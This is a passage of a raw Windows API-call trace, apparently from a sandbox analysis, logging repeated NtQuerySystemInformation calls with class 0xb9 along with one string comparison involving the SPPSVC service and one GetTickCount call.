NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe4e0, Length=0x58, ResultLength=0x0) [0258.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe450, Length=0x28, ResultLength=0x0) [0258.052] _wcsicmp (_String1="SPPSVC\\$$global$$", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0258.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe4e0, Length=0x58, ResultLength=0x0) [0258.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe4e0, Length=0x58, ResultLength=0x0) [0258.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe4e0, Length=0x58, ResultLength=0x0) [0258.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0258.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x28, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x28, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x28, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x28, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe270, Length=0x28, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2f0, Length=0x28, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2f0, Length=0x28, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0258.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x20, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0e0, Length=0x20, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0e0, Length=0x20, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0e0, Length=0x20, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe330, Length=0x20, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe250, Length=0x20, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe250, Length=0x20, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe250, Length=0x20, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1e0, Length=0x20, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1e0, Length=0x20, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe4e0, Length=0x58, ResultLength=0x0) [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe420, Length=0x20, ResultLength=0x0) [0258.063] GetTickCount () returned 0x1180e75 [0258.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d8, Length=0x58, ResultLength=0x0) [0258.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x38, ResultLength=0x0) [0258.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe020, Length=0x28, ResultLength=0x0) [0258.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe020, Length=0x28, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe020, Length=0x28, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe020, Length=0x28, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe090, Length=0x28, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x38, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x28, ResultLength=0x0) [0258.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x28, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x38, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x20, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdff0, Length=0x20, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdff0, Length=0x20, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdff0, Length=0x20, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x38, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x20, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x20, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x20, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d8, Length=0x58, ResultLength=0x0) [0258.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1b0, Length=0x38, ResultLength=0x0) [0258.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdff0, Length=0x28, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdff0, Length=0x28, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdff0, Length=0x28, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdff0, Length=0x28, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe060, Length=0x28, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1b0, Length=0x38, ResultLength=0x0) [0258.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1b0, Length=0x38, ResultLength=0x0) [0258.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0e0, Length=0x28, ResultLength=0x0) [0258.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0e0, Length=0x28, ResultLength=0x0) [0258.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1b0, Length=0x38, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1b0, Length=0x38, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf50, Length=0x20, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efded0, Length=0x20, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efded0, Length=0x20, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efded0, Length=0x20, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1b0, Length=0x38, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe040, Length=0x20, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfc0, Length=0x20, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfc0, Length=0x20, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfc0, Length=0x20, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1b0, Length=0x38, ResultLength=0x0) [0258.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe040, Length=0x20, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfc0, Length=0x20, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfc0, Length=0x20, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfc0, Length=0x20, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1b0, Length=0x38, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe040, Length=0x20, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfd0, Length=0x20, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfd0, Length=0x20, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 